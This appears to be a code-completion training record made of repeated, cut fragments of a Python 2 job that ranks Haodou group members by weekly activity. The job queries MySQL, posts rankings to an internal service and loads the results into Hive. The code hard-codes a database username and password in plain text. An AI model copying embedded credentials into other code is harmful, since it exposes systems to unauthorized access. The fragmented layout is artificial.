'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval)
| runHiveQL | identifier_name |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def runHiveQL(s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
)
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(use | esultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval)
| rid)
r | conditional_block |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def runHiveQL(s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
)
reload(sys)
sys.setdefaultencoding('utf8') |
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
